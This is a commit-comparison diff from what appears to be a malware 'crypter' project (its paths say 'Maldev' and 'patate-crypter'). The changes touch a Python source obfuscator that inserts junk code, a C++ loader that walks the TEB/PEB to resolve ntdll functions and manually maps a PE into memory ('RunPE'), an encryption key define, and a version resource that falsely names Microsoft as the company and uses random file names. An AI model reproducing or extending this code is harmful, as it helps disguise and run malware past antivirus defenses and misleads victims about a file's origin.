Compare commits
2 Commits
15c8e787e2
...
89883c9153
| Author | SHA1 | Date | |
|---|---|---|---|
89883c9153
|
|||
|
644be7fb11
|
@@ -153,7 +153,7 @@ class Ui_mainWindow(object):
|
|||||||
if self.climode :
|
if self.climode :
|
||||||
out_filename = self.filename.replace(".exe", "") + "_out.exe"
|
out_filename = self.filename.replace(".exe", "") + "_out.exe"
|
||||||
else :
|
else :
|
||||||
out_filename = "../bin/" + self.filename + "_out.exe"
|
out_filename = "../bin/" + self.filename.replace(".exe", "") + "_out.exe"
|
||||||
xor_key = ''
|
xor_key = ''
|
||||||
|
|
||||||
if self.xor :
|
if self.xor :
|
||||||
|
|||||||
@@ -173,6 +173,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk, is64bit) :
|
|||||||
in_switch = False
|
in_switch = False
|
||||||
in_asm = False
|
in_asm = False
|
||||||
in_dowhile = False
|
in_dowhile = False
|
||||||
|
in_struct = False
|
||||||
can_code = False
|
can_code = False
|
||||||
wait_for_func_close = False
|
wait_for_func_close = False
|
||||||
in_debug = False
|
in_debug = False
|
||||||
@@ -202,6 +203,8 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk, is64bit) :
|
|||||||
elif in_switch and "}" in line and not "case" in line and not "default" in line : in_switch = False
|
elif in_switch and "}" in line and not "case" in line and not "default" in line : in_switch = False
|
||||||
if "__asm" in line : in_asm = True
|
if "__asm" in line : in_asm = True
|
||||||
elif in_asm and "}" in line : in_asm = False
|
elif in_asm and "}" in line : in_asm = False
|
||||||
|
if "struct" in line : in_struct = True
|
||||||
|
elif in_struct and "}" in line : in_struct = False
|
||||||
if "// Your code here" in line :
|
if "// Your code here" in line :
|
||||||
#can_code = True
|
#can_code = True
|
||||||
pass
|
pass
|
||||||
@@ -224,7 +227,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk, is64bit) :
|
|||||||
b = re.search(func_def_pattern, line) != None
|
b = re.search(func_def_pattern, line) != None
|
||||||
|
|
||||||
if not can_code :
|
if not can_code :
|
||||||
if b or a or in_comment or in_switch or in_asm : continue # we can't write
|
if b or a or in_comment or in_switch or in_asm or in_struct : continue # we can't write
|
||||||
|
|
||||||
if GetRandomBool() and junk and k < PASS : # do we create a variable ?
|
if GetRandomBool() and junk and k < PASS : # do we create a variable ?
|
||||||
out.append(GetRandomVar()+"\n")
|
out.append(GetRandomVar()+"\n")
|
||||||
|
|||||||
@@ -1,2 +1,2 @@
|
|||||||
#pragma once
|
#pragma once
|
||||||
#define KEY "ougoqugduzqd"
|
#define KEY ""
|
||||||
@@ -1,3 +1,5 @@
|
|||||||
|
typedef struct IUnknown IUnknown;
|
||||||
|
|
||||||
#include <windows.h>
|
#include <windows.h>
|
||||||
#include <cstdio>
|
#include <cstdio>
|
||||||
#include <iostream>
|
#include <iostream>
|
||||||
@@ -91,13 +93,25 @@ typedef NTSTATUS (NTAPI *NtAllocateVirtualMemoryPtr)(HANDLE ProcessHandle, PVOID
|
|||||||
typedef NTSTATUS (NTAPI *LdrLoadDllPtr)(PWCHAR, ULONG, PUNICODE_STRING, PHANDLE);
|
typedef NTSTATUS (NTAPI *LdrLoadDllPtr)(PWCHAR, ULONG, PUNICODE_STRING, PHANDLE);
|
||||||
typedef NTSTATUS (NTAPI *RtlInitUnicodeStringPtr)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
|
typedef NTSTATUS (NTAPI *RtlInitUnicodeStringPtr)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
|
||||||
|
|
||||||
|
typedef struct __TEB {
|
||||||
|
PVOID Reserved1[12];
|
||||||
|
PPEB ProcessEnvironmentBlock;
|
||||||
|
PVOID Reserved2[399];
|
||||||
|
BYTE Reserved3[1952];
|
||||||
|
PVOID TlsSlots[64];
|
||||||
|
BYTE Reserved4[8];
|
||||||
|
PVOID Reserved5[26];
|
||||||
|
PVOID ReservedForOle;
|
||||||
|
PVOID Reserved6[4];
|
||||||
|
PVOID TlsExpansionSlots;
|
||||||
|
} TEB_, * PTEB_;
|
||||||
|
|
||||||
void* get_ntfunction(const char* func) {
|
void* get_ntfunction(const char* func) {
|
||||||
//START
|
//START
|
||||||
#ifdef _M_X64
|
#ifdef _M_X64
|
||||||
PTEB tebPtr = reinterpret_cast<PTEB>(__readgsqword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
|
PTEB_ tebPtr = reinterpret_cast<PTEB_>(__readgsqword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
|
||||||
#else
|
#else
|
||||||
PTEB tebPtr = reinterpret_cast<PTEB>(__readfsdword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
|
PTEB_ tebPtr = reinterpret_cast<PTEB_>(__readfsdword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
PPEB_LDR_DATA ldrData = tebPtr->ProcessEnvironmentBlock->Ldr;
|
PPEB_LDR_DATA ldrData = tebPtr->ProcessEnvironmentBlock->Ldr;
|
||||||
@@ -154,6 +168,7 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
|
|||||||
return NULL;
|
return NULL;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
DEBUG_PRINTF("[+] Allocated memory at 0x%p\n", image_base);
|
||||||
const IMAGE_SECTION_HEADER* section_headers = reinterpret_cast<const IMAGE_SECTION_HEADER*>(nt_headers + 1);
|
const IMAGE_SECTION_HEADER* section_headers = reinterpret_cast<const IMAGE_SECTION_HEADER*>(nt_headers + 1);
|
||||||
// Copy the section data to the allocated memory.
|
// Copy the section data to the allocated memory.
|
||||||
for (WORD i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
|
for (WORD i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
|
||||||
|
|||||||
@@ -68,12 +68,12 @@ BEGIN
|
|||||||
BLOCK "040c04b0"
|
BLOCK "040c04b0"
|
||||||
BEGIN
|
BEGIN
|
||||||
VALUE "CompanyName", "Microsoft"
|
VALUE "CompanyName", "Microsoft"
|
||||||
VALUE "FileDescription", "cixctkirmfubayfzkbog"
|
VALUE "FileDescription", "dnsfzllrjwhkcwdfijbb"
|
||||||
VALUE "FileVersion", "1.0.0.1"
|
VALUE "FileVersion", "1.0.0.1"
|
||||||
VALUE "InternalName", "bcjphkt.exe"
|
VALUE "InternalName", "fbjriet.exe"
|
||||||
VALUE "LegalCopyright", "Copyright (C) 2023"
|
VALUE "LegalCopyright", "Copyright (C) 2023"
|
||||||
VALUE "OriginalFilename", "nybxftw.exe"
|
VALUE "OriginalFilename", "pvgcwpf.exe"
|
||||||
VALUE "ProductName", "txwfqte.exe"
|
VALUE "ProductName", "wisjfvx.exe"
|
||||||
VALUE "ProductVersion", "1.0.0.1"
|
VALUE "ProductVersion", "1.0.0.1"
|
||||||
END
|
END
|
||||||
END
|
END
|
||||||
@@ -83,7 +83,7 @@ BEGIN
|
|||||||
END
|
END
|
||||||
END
|
END
|
||||||
|
|
||||||
MAINICON ICON "C:/Users/patate/Desktop/Programmation/C++/Maldev/patate-crypter/icon.ico"
|
//MAINICON ICON ""
|
||||||
#endif
|
#endif
|
||||||
/////////////////////////////////////////////////////////////////////////////
|
/////////////////////////////////////////////////////////////////////////////
|
||||||
|
|
||||||
|
|||||||
@@ -29,26 +29,26 @@
|
|||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<PlatformToolset>v143</PlatformToolset>
|
<PlatformToolset>ClangCL</PlatformToolset>
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<PlatformToolset>v143</PlatformToolset>
|
<PlatformToolset>ClangCL</PlatformToolset>
|
||||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<PlatformToolset>v143</PlatformToolset>
|
<PlatformToolset>ClangCL</PlatformToolset>
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<PlatformToolset>v143</PlatformToolset>
|
<PlatformToolset>ClangCL</PlatformToolset>
|
||||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
|
|||||||
Reference in New Issue
Block a user